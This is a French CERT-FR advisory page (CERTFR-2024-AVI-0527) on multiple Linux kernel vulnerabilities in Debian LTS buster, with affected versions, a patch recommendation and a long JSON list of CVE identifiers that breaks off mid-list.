Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CERTFR-2024-AVI-0527
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Debian | N/A | Debian LTS buster versions antérieures à 5.10.209-2~deb10u1 | ||
| Debian | N/A | Debian LTS buster versions antérieures à 5.10.218-1~deb10u1 | ||
| Debian | N/A | Debian LTS buster versions antérieures à 5.10.216-1~deb10u1 | ||
| Debian | N/A | Debian LTS buster versions antérieures à 4.19.316-1 |
References
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian LTS buster versions ant\u00e9rieures \u00e0 5.10.209-2~deb10u1",
"product": {
"name": "N/A",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS buster versions ant\u00e9rieures \u00e0 5.10.218-1~deb10u1",
"product": {
"name": "N/A",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS buster versions ant\u00e9rieures \u00e0 5.10.216-1~deb10u1",
"product": {
"name": "N/A",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS buster versions ant\u00e9rieures \u00e0 4.19.316-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"name": "CVE-2023-0386",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0386"
},
{
"name": "CVE-2023-39198",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39198"
},
{
"name": "CVE-2023-6606",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6606"
},
{
"name": "CVE-2023-51779",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51779"
},
{
"name": "CVE-2023-46838",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46838"
},
{
"name": "CVE-2023-6040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6040"
},
{
"name": "CVE-2023-6536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6536"
},
{
"name": "CVE-2023-6356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6356"
},
{
"name": "CVE-2023-6535",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6535"
},
{
"name": "CVE-2024-0646",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0646"
},
{
"name": "CVE-2024-0607",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0607"
},
{
"name": "CVE-2024-0565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0565"
},
{
"name": "CVE-2023-6915",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6915"
},
{
"name": "CVE-2024-0340",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0340"
},
{
"name": "CVE-2023-47233",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47233"
},
{
"name": "CVE-2024-24860",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24860"
},
{
"name": "CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"name": "CVE-2023-28746",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28746"
},
{
"name": "CVE-2023-52454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52454"
},
{
"name": "CVE-2024-26600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26600"
},
{
"name": "CVE-2023-52467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52467"
},
{
"name": "CVE-2023-52451",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52451"
},
{
"name": "CVE-2023-52436",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52436"
},
{
"name": "CVE-2023-52445",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52445"
},
{
"name": "CVE-2023-52597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52597"
},
{
"name": "CVE-2024-26598",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26598"
},
{
"name": "CVE-2023-52462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52462"
},
{
"name": "CVE-2023-52443",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52443"
},
{
"name": "CVE-2023-52469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52469"
},
{
"name": "CVE-2023-52598",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52598"
},
{
"name": "CVE-2023-52470",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52470"
},
{
"name": "CVE-2023-52601",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52601"
},
{
"name": "CVE-2023-52439",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52439"
},
{
"name": "CVE-2023-52438",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52438"
},
{
"name": "CVE-2023-52464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52464"
},
{
"name": "CVE-2023-52600",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52600"
},
{
"name": "CVE-2023-52458",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52458"
},
{
"name": "CVE-2023-52602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52602"
},
{
"name": "CVE-2024-26625",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26625"
},
{
"name": "CVE-2024-26627",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26627"
},
{
"name": "CVE-2023-52463",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52463"
},
{
"name": "CVE-2023-52447",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52447"
},
{
"name": "CVE-2023-52449",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52449"
},
{
"name": "CVE-2024-26581",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26581"
},
{
"name": "CVE-2023-52457",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52457"
},
{
"name": "CVE-2023-52606",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52606"
},
{
"name": "CVE-2023-52604",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52604"
},
{
"name": "CVE-2023-52587",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52587"
},
{
"name": "CVE-2023-52448",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52448"
},
{
"name": "CVE-2023-52599",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52599"
},
{
"name": "CVE-2023-52444",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52444"
},
{
"name": "CVE-2023-52583",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52583"
},
{
"name": "CVE-2023-52603",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52603"
},
{
"name": "CVE-2023-52456",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52456"
},
{
"name": "CVE-2023-52607",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52607"
},
{
"name": "CVE-2023-52594",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52594"
},
{
"name": "CVE-2024-26601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26601"
},
{
"name": "CVE-2023-52595",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52595"
},
{
"name": "CVE-2024-23849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23849"
},
{
"name": "CVE-2024-26597",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26597"
},
{
"name": "CVE-2024-26602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26602"
},
{
"name": "CVE-2023-52340",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52340"
},
{
"name": "CVE-2024-23850",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23850"
},
{
"name": "CVE-2024-26622",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26622"
},
{
"name": "CVE-2024-23851",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23851"
},
{
"name": "CVE-2024-1151",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1151"
},
{
"name": "CVE-2023-6270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6270"
},
{
"name": "CVE-2024-26593",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26593"
},
{
"name": "CVE-2023-52429",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52429"
},
{
"name": "CVE-2023-52482",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52482"
},
{
"name": "CVE-2024-26586",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26586"
},
{
"name": "CVE-2022-48627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48627"
},
{
"name": "CVE-2024-26633",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26633"
},
{
"name": "CVE-2023-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52434"
},
{
"name": "CVE-2023-52609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52609"
},
{
"name": "CVE-2023-52435",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52435"
},
{
"name": "CVE-2023-52612",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52612"
},
{
"name": "CVE-2024-26642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26642"
},
{
"name": "CVE-2023-52617",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52617"
},
{
"name": "CVE-2024-26645",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26645"
},
{
"name": "CVE-2024-0841",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0841"
},
{
"name": "CVE-2024-26695",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26695"
},
{
"name": "CVE-2024-26654",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26654"
},
{
"name": "CVE-2023-52615",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52615"
},
{
"name": "CVE-2024-26659",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26659"
},
{
"name": "CVE-2023-52486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52486"
},
{
"name": "CVE-2023-52628",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52628"
},
{
"name": "CVE-2023-52493",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52493"
},
{
"name": "CVE-2024-26614",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26614"
},
{
"name": "CVE-2023-52637",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52637"
},
{
"name": "CVE-2023-52497",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52497"
},
{
"name": "CVE-2023-52492",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52492"
},
{
"name": "CVE-2024-25739",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25739"
},
{
"name": "CVE-2024-22099",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22099"
},
{
"name": "CVE-2024-26664",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26664"
},
{
"name": "CVE-2023-52623",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52623"
},
{
"name": "CVE-2023-52619",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52619"
},
{
"name": "CVE-2024-26651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26651"
},
{
"name": "CVE-2023-7042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7042"
},
{
"name": "CVE-2024-26707",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26707"
},
{
"name": "CVE-2024-26754",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26754"
},
{
"name": "CVE-2024-26795",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26795"
},
{
"name": "CVE-2024-26697",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26697"
},
{
"name": "CVE-2024-26704",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26704"
},
{
"name": "CVE-2024-26720",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26720"
},
{
"name": "CVE-2023-52622",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52622"
},
{
"name": "CVE-2024-26689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26689"
},
{
"name": "CVE-2024-26727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26727"
},
{
"name": "CVE-2024-26671",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26671"
},
{
"name": "CVE-2024-26748",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26748"
},
{
"name": "CVE-2024-26776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26776"
},
{
"name": "CVE-2024-26606",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26606"
},
{
"name": "CVE-2024-26702",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26702"
},
{
"name": "CVE-2024-26766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26766"
},
{
"name": "CVE-2024-26814",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26814"
},
{
"name": "CVE-2024-26685",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26685"
},
{
"name": "CVE-2024-26771",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26771"
},
{
"name": "CVE-2024-26810",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26810"
},
{
"name": "CVE-2024-26801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26801"
},
{
"name": "CVE-2024-26787",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26787"
},
{
"name": "CVE-2024-26781",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26781"
},
{
"name": "CVE-2024-26663",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26663"
},
{
"name": "CVE-2024-26675",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26675"
},
{
"name": "CVE-2024-26752",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26752"
},
{
"name": "CVE-2024-26743",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26743"
},
{
"name": "CVE-2024-26805",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26805"
},
{
"name": "CVE-2024-26773",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26773"
},
{
"name": "CVE-2023-52618",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52618"
},
{
"name": "CVE-2024-26712",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26712"
},
{
"name": "CVE-2024-26793",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26793"
},
{
"name": "CVE-2024-24858",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24858"
},
{
"name": "CVE-2023-52616",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52616"
},
{
"name": "CVE-2024-26813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26813"
},
{
"name": "CVE-2024-26764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26764"
},
{
"name": "CVE-2024-27437",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27437"
},
{
"name": "CVE-2024-26735",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26735"
},
{
"name": "CVE-2024-26684",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26684"
},
{
"name": "CVE-2024-24857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24857"
},
{
"name": "CVE-2024-26679",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26679"
},
{
"name": "CVE-2024-26816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26816"
},
{
"name": "CVE-2024-26749",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26749"
},
{
"name": "CVE-2024-26688",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26688"
},
{
"name": "CVE-2024-26744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26744"
},
{
"name": "CVE-2024-26640",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26640"
},
{
"name": "CVE-2024-26763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26763"
},
{
"name": "CVE-2024-26722",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26722"
},
{
"name": "CVE-2024-26777",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26777"
},
{
"name": "CVE-2024-26733",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26733"
},
{
"name": "CVE-2024-26779",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26779"
},
{
"name": "CVE-2023-52620",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52620"
},
{
"name": "CVE-2024-26772",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26772"
},
{
"name": "CVE-2024-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26791"
},
{
"name": "CVE-2023-52635",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52635"
},
{
"name": "CVE-2024-26788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26788"
},
{
"name": "CVE-2024-26812",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26812"
},
{
"name": "CVE-2024-26643",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26643"
},
{
"name": "CVE-2024-26804",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26804"
},
{
"name": "CVE-2024-26665",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26665"
},
{
"name": "CVE-2024-26747",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26747"
},
{
"name": "CVE-2024-26696",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26696"
},
{
"name": "CVE-2024-26698",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26698"
},
{
"name": "CVE-2024-26687",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26687"
},
{
"name": "CVE-2024-26778",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26778"
},
{
"name": "CVE-2024-26790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26790"
},
{
"name": "CVE-2024-26809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26809"
},
{
"name": "CVE-2024-26673",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26673"
},
{
"name": "CVE-2024-26753",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26753"
},
{
"name": "CVE-2024-26751",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26751"
},
{
"name": "CVE-2024-26736",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26736"
},
{
"name": "CVE-2024-26641",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26641"
},
{
"name": "CVE-2024-26782",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26782"
},
{
"name": "CVE-2024-26848",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26848"
},
{
"name": "CVE-2023-52488",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52488"
},
{
"name": "CVE-2023-52627",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52627"
},
{
"name": "CVE-2023-52489",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52489"
},
{
"name": "CVE-2024-26897",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26897"
},
{
"name": "CVE-2024-26870",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26870"
},
{
"name": "CVE-2024-27044",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27044"
},
{
"name": "CVE-2024-26839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26839"
},
{
"name": "CVE-2024-26863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26863"
},
{
"name": "CVE-2024-26966",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26966"
},
{
"name": "CVE-2024-27025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27025"
},
{
"name": "CVE-2024-27047",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27047"
},
{
"name": "CVE-2024-26845",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26845"
},
{
"name": "CVE-2024-27028",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27028"
},
{
"name": "CVE-2024-26970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26970"
},
{
"name": "CVE-2024-26861",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26861"
},
{
"name": "CVE-2024-26895",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26895"
},
{
"name": "CVE-2024-26961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26961"
},
{
"name": "CVE-2024-26978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26978"
},
{
"name": "CVE-2024-26917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26917"
},
{
"name": "CVE-2024-27013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27013"
},
{
"name": "CVE-2024-26840",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26840"
},
{
"name": "CVE-2023-52644",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52644"
},
{
"name": "CVE-2024-26910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26910"
},
{
"name": "CVE-2024-26615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26615"
},
{
"name": "CVE-2024-26931",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26931"
},
{
"name": "CVE-2024-26846",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26846"
},
{
"name": "CVE-2024-26958",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26958"
},
{
"name": "CVE-2024-27008",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27008"
},
{
"name": "CVE-2024-26610",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26610"
},
{
"name": "CVE-2024-26872",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26872"
},
{
"name": "CVE-2024-26875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26875"
},
{
"name": "CVE-2024-26906",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26906"
},
{
"name": "CVE-2024-26843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26843"
},
{
"name": "CVE-2024-26907",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26907"
},
{
"name": "CVE-2024-26925",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26925"
},
{
"name": "CVE-2024-26934",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26934"
},
{
"name": "CVE-2024-26957",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26957"
},
{
"name": "CVE-2024-26981",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26981"
},
{
"name": "CVE-2024-26889",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26889"
},
{
"name": "CVE-2024-27000",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27000"
},
{
"name": "CVE-2024-26833",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26833"
},
{
"name": "CVE-2024-26880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26880"
},
{
"name": "CVE-2024-27388",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27388"
},
{
"name": "CVE-2024-26883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26883"
},
{
"name": "CVE-2024-26644",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26644"
},
{
"name": "CVE-2024-26935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26935"
},
{
"name": "CVE-2024-26974",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26974"
},
{
"name": "CVE-2024-26965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26965"
},
{
"name": "CVE-2024-26882",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26882"
},
{
"name": "CVE-2024-26984",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26984"
},
{
"name": "CVE-2024-27020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27020"
},
{
"name": "CVE-2024-26973",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26973"
},
{
"name": "CVE-2024-27059",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27059"
},
{
"name": "CVE-2024-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26960"
},
{
"name": "CVE-2024-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27043"
},
{
"name": "CVE-2024-26820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26820"
},
{
"name": "CVE-2024-27038",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27038"
},
{
"name": "CVE-2024-27051",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27051"
},
{
"name": "CVE-2024-27073",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27073"
},
{
"name": "CVE-2024-26635",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26635"
},
{
"name": "CVE-2024-26950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26950"
},
{
"name": "CVE-2024-26999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26999"
},
{
"name": "CVE-2023-52498",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52498"
},
{
"name": "CVE-2024-26874",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26874"
},
{
"name": "CVE-2023-52491",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52491"
},
{
"name": "CVE-2024-26956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26956"
},
{
"name": "CVE-2024-26924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26924"
},
{
"name": "CVE-2024-24861",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24861"
},
{
"name": "CVE-2024-27004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27004"
},
{
"name": "CVE-2024-26955",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26955"
},
{
"name": "CVE-2024-27052",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27052"
},
{
"name": "CVE-2024-27074",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27074"
},
{
"name": "CVE-2023-52650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52650"
},
{
"name": "CVE-2024-26808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26808"
},
{
"name": "CVE-2024-26817",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26817"
},
{
"name": "CVE-2024-26857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26857"
},
{
"name": "CVE-2024-27001",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27001"
},
{
"name": "CVE-2024-26885",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26885"
},
{
"name": "CVE-2024-26878",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26878"
},
{
"name": "CVE-2024-26894",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26894"
},
{
"name": "CVE-2024-26835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26835"
},
{
"name": "CVE-2024-26976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26976"
},
{
"name": "CVE-2024-26852",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26852"
},
{
"name": "CVE-2024-26859",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26859"
},
{
"name": "CVE-2024-26994",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26994"
},
{
"name": "CVE-2024-26636",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26636"
},
{
"name": "CVE-2024-26898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26898"
},
{
"name": "CVE-2023-52642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52642"
},
{
"name": "CVE-2024-26969",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26969"
},
{
"name": "CVE-2023-52614",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52614"
},
{
"name": "CVE-2024-26877",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26877"
},
{
"name": "CVE-2024-26937",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26937"
},
{
"name": "CVE-2024-27030",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27030"
},
{
"name": "CVE-2024-27065",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27065"
},
{
"name": "CVE-2024-26997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26997"
},
{
"name": "CVE-2024-26922",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26922"
},
{
"name": "CVE-2024-26884",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26884"
},
{
"name": "CVE-2024-27076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27076"
},
{
"name": "CVE-2024-26862",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26862"
},
{
"name": "CVE-2024-27077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27077"
},
{
"name": "CVE-2024-27078",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27078"
},
{
"name": "CVE-2024-26825",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26825"
},
{
"name": "CVE-2024-26901",
